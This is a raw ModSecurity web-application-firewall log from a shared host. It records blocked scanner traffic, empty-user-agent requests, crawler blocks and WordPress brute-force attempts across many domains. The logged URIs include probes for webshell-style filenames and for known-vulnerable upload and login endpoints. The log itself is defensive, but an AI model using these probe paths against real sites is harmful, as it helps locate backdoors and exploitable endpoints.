[Tue May 26 15:12:28.214231 2026] [security2:error] [pid 686593:tid 686788] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrA-ilgkZcvx0_tl-3ZQAAAMY"]
[Tue May 26 15:12:28.359711 2026] [security2:error] [pid 686593:tid 686734] [client 104.43.242.179:32122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/ingfo.php"] [unique_id "ahVrBOilgkZcvx0_tl-3cwAAAJA"]
[Tue May 26 15:12:28.359828 2026] [security2:error] [pid 686593:tid 686734] [client 104.43.242.179:32122] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/ingfo.php"] [unique_id "ahVrBOilgkZcvx0_tl-3cwAAAJA"]
[Tue May 26 15:12:29.657917 2026] [security2:error] [pid 686593:tid 686723] [client 104.43.242.179:26132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/c55cdler.php"] [unique_id "ahVrBeilgkZcvx0_tl-3rAAAAIU"]
[Tue May 26 15:12:29.658005 2026] [security2:error] [pid 686593:tid 686723] [client 104.43.242.179:26132] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/c55cdler.php"] [unique_id "ahVrBeilgkZcvx0_tl-3rAAAAIU"]
[Tue May 26 15:12:29.918898 2026] [security2:error] [pid 686593:tid 686848] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrBeilgkZcvx0_tl-3ogAAAQI"]
[Tue May 26 15:12:30.084390 2026] [security2:error] [pid 686593:tid 686734] [client 34.32.247.234:32768] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "dev.cicodev.org"] [uri "/"] [unique_id "ahVrBuilgkZcvx0_tl-3tgAAAJA"]
[Tue May 26 15:12:30.084494 2026] [security2:error] [pid 686593:tid 686734] [client 34.32.247.234:32768] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dev.cicodev.org"] [uri "/"] [unique_id "ahVrBuilgkZcvx0_tl-3tgAAAJA"]
[Tue May 26 15:12:30.291831 2026] [security2:error] [pid 686593:tid 686728] [client 104.43.242.179:51275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/error_log.php"] [unique_id "ahVrBuilgkZcvx0_tl-3wgAAAIo"]
[Tue May 26 15:12:30.291953 2026] [security2:error] [pid 686593:tid 686728] [client 104.43.242.179:51275] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/error_log.php"] [unique_id "ahVrBuilgkZcvx0_tl-3wgAAAIo"]
[Tue May 26 15:12:31.067001 2026] [security2:error] [pid 686593:tid 686799] [client 104.43.242.179:18325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/xenon1337.php"] [unique_id "ahVrB-ilgkZcvx0_tl-30QAAANE"]
[Tue May 26 15:12:31.067112 2026] [security2:error] [pid 686593:tid 686799] [client 104.43.242.179:18325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/xenon1337.php"] [unique_id "ahVrB-ilgkZcvx0_tl-30QAAANE"]
[Tue May 26 15:12:32.699679 2026] [security2:error] [pid 686593:tid 686811] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrCOilgkZcvx0_tl-4AwAAAN0"]
[Tue May 26 15:12:33.347480 2026] [security2:error] [pid 686593:tid 686824] [client 104.43.242.179:20866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/alfa403.php"] [unique_id "ahVrCeilgkZcvx0_tl-4GAAAAOo"]
[Tue May 26 15:12:33.347609 2026] [security2:error] [pid 686593:tid 686824] [client 104.43.242.179:20866] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/alfa403.php"] [unique_id "ahVrCeilgkZcvx0_tl-4GAAAAOo"]
[Tue May 26 15:12:34.676496 2026] [security2:error] [pid 686593:tid 686724] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrCuilgkZcvx0_tl-4NAAAAIY"]
[Tue May 26 15:12:34.701705 2026] [security2:error] [pid 686593:tid 686783] [client 23.94.40.119:39684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/general/index/UploadFile.php"] [unique_id "ahVrCuilgkZcvx0_tl-4RgAAAME"]
[Tue May 26 15:12:34.703616 2026] [security2:error] [pid 686593:tid 686807] [client 23.94.40.119:39700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/scripts/setup.php"] [unique_id "ahVrCuilgkZcvx0_tl-4RwAAANk"]
[Tue May 26 15:12:34.740990 2026] [security2:error] [pid 686593:tid 686748] [client 23.94.40.119:39668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php/User/doLogin"] [unique_id "ahVrCuilgkZcvx0_tl-4TQAAAJ4"]
[Tue May 26 15:12:34.868452 2026] [security2:error] [pid 686593:tid 686766] [client 23.94.40.119:39558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php"] [unique_id "ahVrCuilgkZcvx0_tl-4UAAAALA"]
[Tue May 26 15:12:34.909707 2026] [security2:error] [pid 686593:tid 686790] [client 23.94.40.119:39574] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/seeyon/htmlofficeservlet"] [unique_id "ahVrCuilgkZcvx0_tl-4VAAAAMg"]
[Tue May 26 15:12:35.063004 2026] [security2:error] [pid 686593:tid 686795] [client 185.191.171.8:22758] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVrC-ilgkZcvx0_tl-4XwAAAM0"]
[Tue May 26 15:12:35.063139 2026] [security2:error] [pid 686593:tid 686795] [client 185.191.171.8:22758] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVrC-ilgkZcvx0_tl-4XwAAAM0"]
[Tue May 26 15:12:35.141969 2026] [security2:error] [pid 686593:tid 686750] [client 23.94.40.119:39728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php"] [unique_id "ahVrC-ilgkZcvx0_tl-4YwAAAKA"]
[Tue May 26 15:12:35.150463 2026] [security2:error] [pid 686593:tid 686812] [client 23.94.40.119:39598] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php"] [unique_id "ahVrC-ilgkZcvx0_tl-4aAAAAN4"]
[Tue May 26 15:12:35.172307 2026] [security2:error] [pid 686593:tid 686804] [client 23.94.40.119:39618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/public/index.php"] [unique_id "ahVrC-ilgkZcvx0_tl-4bAAAANY"]
[Tue May 26 15:12:35.702753 2026] [security2:error] [pid 686593:tid 686846] [client 104.43.242.179:45383] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/test11.php"] [unique_id "ahVrC-ilgkZcvx0_tl-4fwAAAQA"]
[Tue May 26 15:12:35.702847 2026] [security2:error] [pid 686593:tid 686846] [client 104.43.242.179:45383] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/test11.php"] [unique_id "ahVrC-ilgkZcvx0_tl-4fwAAAQA"]
[Tue May 26 15:12:35.824219 2026] [security2:error] [pid 686593:tid 686807] [client 196.51.12.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVrC-ilgkZcvx0_tl-4ggAAANk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:12:36.250442 2026] [security2:error] [pid 686593:tid 686805] [client 85.121.240.156:41954] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrC-ilgkZcvx0_tl-4gwAAANc"]
[Tue May 26 15:12:36.902183 2026] [security2:error] [pid 686593:tid 686772] [client 196.51.12.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVrDOilgkZcvx0_tl-4nAAAALY"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1280661&moderation-hash=635f273bee50743c651750021935dde8
[Tue May 26 15:12:37.157519 2026] [security2:error] [pid 686593:tid 686741] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrDOilgkZcvx0_tl-4mQAAAJc"]
[Tue May 26 15:12:37.654019 2026] [security2:error] [pid 686593:tid 686769] [client 104.43.242.179:19172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/koala.php"] [unique_id "ahVrDeilgkZcvx0_tl-4rgAAALM"]
[Tue May 26 15:12:37.654138 2026] [security2:error] [pid 686593:tid 686769] [client 104.43.242.179:19172] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/koala.php"] [unique_id "ahVrDeilgkZcvx0_tl-4rgAAALM"]
[Tue May 26 15:12:37.837641 2026] [security2:error] [pid 686593:tid 686732] [client 23.94.40.119:39864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/images/logo/logo-eoffice.php"] [unique_id "ahVrDeilgkZcvx0_tl-4vAAAAI4"]
[Tue May 26 15:12:37.958374 2026] [security2:error] [pid 686593:tid 686824] [client 172.225.181.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVrDeilgkZcvx0_tl-4sgAAAOo"]
[Tue May 26 15:12:38.438899 2026] [security2:error] [pid 686593:tid 686781] [client 46.8.222.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVrDuilgkZcvx0_tl-4zgAAAL8"], referer: https://www.anujtradingco.com/
[Tue May 26 15:12:38.451081 2026] [security2:error] [pid 686593:tid 686819] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrDuilgkZcvx0_tl-4xQAAAOU"]
[Tue May 26 15:12:38.794661 2026] [security2:error] [pid 686593:tid 686739] [client 104.43.242.179:48798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/mac.php"] [unique_id "ahVrDuilgkZcvx0_tl-42wAAAJU"]
[Tue May 26 15:12:38.794773 2026] [security2:error] [pid 686593:tid 686739] [client 104.43.242.179:48798] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/mac.php"] [unique_id "ahVrDuilgkZcvx0_tl-42wAAAJU"]
[Tue May 26 15:12:38.828209 2026] [security2:error] [pid 686593:tid 686816] [client 23.94.40.119:42226] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php"] [unique_id "ahVrDuilgkZcvx0_tl-43wAAAOI"]
[Tue May 26 15:12:38.829320 2026] [security2:error] [pid 686593:tid 686815] [client 23.94.40.119:42254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php"] [unique_id "ahVrDuilgkZcvx0_tl-44QAAAOE"]
[Tue May 26 15:12:39.404587 2026] [security2:error] [pid 686593:tid 686789] [client 104.43.242.179:20888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/25d653587fdfd1.php"] [unique_id "ahVrD-ilgkZcvx0_tl-4-gAAAMc"]
[Tue May 26 15:12:39.404760 2026] [security2:error] [pid 686593:tid 686789] [client 104.43.242.179:20888] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/25d653587fdfd1.php"] [unique_id "ahVrD-ilgkZcvx0_tl-4-gAAAMc"]
[Tue May 26 15:12:39.437988 2026] [security2:error] [pid 686593:tid 686849] [client 46.8.222.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVrD-ilgkZcvx0_tl-4-QAAAQM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1509229&moderation-hash=ff24f933c09b701217bb336db4922b36
[Tue May 26 15:12:39.821014 2026] [security2:error] [pid 686593:tid 686833] [client 23.94.40.119:42294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/lcms/index.php"] [unique_id "ahVrD-ilgkZcvx0_tl-5AQAAAPM"]
[Tue May 26 15:12:41.071552 2026] [security2:error] [pid 686593:tid 686778] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrEOilgkZcvx0_tl-5FAAAALw"]
[Tue May 26 15:12:41.718906 2026] [security2:error] [pid 686593:tid 686839] [client 104.43.242.179:41765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wefile.php"] [unique_id "ahVrEeilgkZcvx0_tl-5LAAAAPk"]
[Tue May 26 15:12:41.719008 2026] [security2:error] [pid 686593:tid 686839] [client 104.43.242.179:41765] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/wefile.php"] [unique_id "ahVrEeilgkZcvx0_tl-5LAAAAPk"]
[Tue May 26 15:12:41.793707 2026] [security2:error] [pid 686593:tid 686789] [client 23.94.40.119:42310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/guest_auth/guestIsUp.php"] [unique_id "ahVrEeilgkZcvx0_tl-5LQAAAMc"]
[Tue May 26 15:12:41.793841 2026] [security2:error] [pid 686593:tid 686789] [client 23.94.40.119:42310] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.pronumbers.com.au"] [uri "/guest_auth/guestIsUp.php"] [unique_id "ahVrEeilgkZcvx0_tl-5LQAAAMc"]
[Tue May 26 15:12:41.873444 2026] [security2:error] [pid 686593:tid 686729] [client 23.94.40.119:42320] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx"] [unique_id "ahVrEeilgkZcvx0_tl-5MQAAAIs"]
[Tue May 26 15:12:42.141494 2026] [security2:error] [pid 686593:tid 686705] [remote 47.251.53.97:35534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVrEeilgkZcvx0_tl-5MgAAv28"]
[Tue May 26 15:12:42.248754 2026] [security2:error] [pid 686593:tid 686768] [client 23.94.40.119:42324] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/"] [unique_id "ahVrEuilgkZcvx0_tl-5PAAAALI"]
[Tue May 26 15:12:42.272968 2026] [security2:error] [pid 686593:tid 686841] [client 104.43.242.179:26113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.242.43.104.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/casp3.php"] [unique_id "ahVrEuilgkZcvx0_tl-5PgAAAPs"]
[Tue May 26 15:12:42.273075 2026] [security2:error] [pid 686593:tid 686841] [client 104.43.242.179:26113] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mexicoimportaciones.com"] [uri "/casp3.php"] [unique_id "ahVrEuilgkZcvx0_tl-5PgAAAPs"]
[Tue May 26 15:12:42.810337 2026] [security2:error] [pid 686593:tid 686639] [remote 49.12.3.147:50308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVrEuilgkZcvx0_tl-5TAAA_y0"]
[Tue May 26 15:12:42.903271 2026] [security2:error] [pid 686593:tid 686776] [client 120.76.249.76:48148] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahVrEeilgkZcvx0_tl-5JQAAALo"], referer: http://www.jhonweb.com/statics/images/ext/dir.gif
[Tue May 26 15:12:43.128363 2026] [security2:error] [pid 686593:tid 686739] [client 23.94.40.119:42352] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "webmail.pronumbers.com.au"] [uri "/"] [unique_id "ahVrE-ilgkZcvx0_tl-5XAAAAJU"]
[Tue May 26 15:12:43.129450 2026] [security2:error] [pid 686593:tid 686816] [client 23.94.40.119:42340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/backupmgt/localJob.php"] [unique_id "ahVrE-ilgkZcvx0_tl-5XQAAAOI"]
[Tue May 26 15:12:43.309015 2026] [security2:error] [pid 686593:tid 686752] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrEuilgkZcvx0_tl-5VAAAAKI"]
[Tue May 26 15:12:43.470469 2026] [security2:error] [pid 686593:tid 686814] [client 23.94.40.119:42376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"] [unique_id "ahVrE-ilgkZcvx0_tl-5bgAAAOA"]
